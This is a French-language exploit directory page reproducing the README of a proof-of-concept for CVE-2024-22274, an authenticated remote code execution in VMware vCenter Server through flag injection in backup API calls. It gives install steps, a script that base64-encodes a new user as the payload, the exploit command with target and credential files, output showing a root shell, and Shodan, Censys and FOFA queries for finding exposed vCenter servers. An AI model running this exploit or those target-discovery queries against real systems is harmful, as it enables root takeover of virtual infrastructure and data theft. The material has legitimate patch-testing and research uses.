Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-22274-RCE — PoC - Exécution de code à distance authentifiée dans VMware vCenter Server (Exploit) | Kitploit
Outils/GitHubGitHub/l0n3m4n/cve-2024-22274-rce
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubl0n3m4n/cve-2024-22274-rce

CVE-2024-22274-RCE

PoC - Exécution de code à distance authentifiée dans VMware vCenter Server (Exploit)

Voir le dépôt
45653il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Escalade de Privilèges : Exécution de Code à Distance (RCE) Authentifiée sur VMware vCenter Server

Facebook X Medium Python Kali

📜 Description

Les composants API « com.vmware.appliance.recovery.backup.job.create » et « com.vmware.appliance.recovery.backup.validate » sont vulnérables à une attaque par injection d'indicateur (flag injection) qui peut être exploitée pour exécuter des commandes arbitraires en tant qu'utilisateur root sur le système cible.

📚 Table des matières

  • 📜 Description
  • 🛠️ Installation
  • ⚙️ Utilisation
  • 🔎 Découverte
  • 📝 Remarques
  • 💁 Références
  • 📢 Avertissement

🛠️ Installation et Configuration

[!NOTE] Pour utiliser ce PoC d'exploitation, vous devez disposer d'identifiants valides et vous connecter au shell de VMware vCenter Server via SSH. L'utilisateur doit avoir le rôle « admin », comme spécifié dans le fichier vcenter_creds.txt.

$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE 
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt 

Exécutez ou modifiez user2base64.sh pour encoder le nouvel utilisateur ajouté en base64 ; cela créera automatiquement payload.txt


$ bash user2base64.sh
Payload a été encodé en base64, sauvegardé dans payload.txt                                 

⚙️ Utilisation

VMware-vCenter

Version vulnérable

vulnerable-version

Exécution et exploitation réussies

$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Auteur : l0n3m4n | vCenter RCE : CVE-2024-22274 | PoC : @mbadanoiu
                                                                              
[+] Connecté à 192.168.56.103 via SSH
[+] Charge utile exécutée avec succès. Sortie : 
   uid=0(root) gid=0(root) groups=0(root)

[+] Exploitation réussie : vous avez un accès root.
[+] Exécution des commandes terminée sur 192.168.56.103

Exécution réussie mais pas d'accès root

Cet exemple signifie que vous êtes connecté mais que la charge utile n'est pas correctement configurée ou chargée. Référez-vous au PDF PoC pour des informations plus détaillées.

 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Auteur : l0n3m4n | vCenter RCE : CVE-2024-22274 | PoC : @mbadanoiu
                                                                              
[+] Connecté à 192.168.56.103 via SSH
[+] Charge utile exécutée avec succès. Sortie : 
   Aucune escalade de privilèges détectée.

[+] Échec de l'exploitation : accès root non obtenu.
[+] Exécution des commandes terminée sur 192.168.56.103

Nom d'utilisateur ou mot de passe manquant dans le fichier de configuration

 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Auteur : l0n3m4n | vCenter RCE : CVE-2024-22274 | PoC : @mbadanoiu
                                                                              
[-] Erreur : Nom d'utilisateur ou mot de passe introuvable dans le fichier de configuration.

Échec de la connexion ou erreur SSH

Veuillez vérifier l'adresse de l'hôte et les identifiants.

 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Auteur : l0n3m4n | vCenter RCE : CVE-2024-22274 | PoC : @mbadanoiu
                                                                              
[-] Erreur : [Erreur SSH] La connexion à 192.168.56.103 a échoué.

🔎 Découverte

  • CENSYS : "VMware vCenter", Filtre : services.port: 443 AND tags: "VMware"
  • FOFA : title="VMware vCenter", Filtre : port="443" && title="VMware vCenter"
  • SHODAN : "VMware vCenter", Filtre : port:443 "VMware vCenter"

📝 Remarques

Ce PoC d'exploitation ne sera pas efficace si vous ne comprenez pas comment interpréter le script, car il a été intentionnellement modifié pour empêcher les « script kiddies » de simplement le copier et l'exécuter sans compréhension. VMware vCenter Server est un composant critique dans la gestion des environnements virtualisés. Si quelqu'un y accède, il peut prendre le contrôle total de l'infrastructure virtuelle et exfiltrer des données sensibles. Ce PoC est conçu pour ceux qui possèdent déjà une petite expertise technique pour l'utiliser correctement ; ainsi, si vous êtes un script kiddie cherchant à causer des perturbations sans comprendre les implications, cet exploit ne vous sera pas utile.

Télécharger l’outil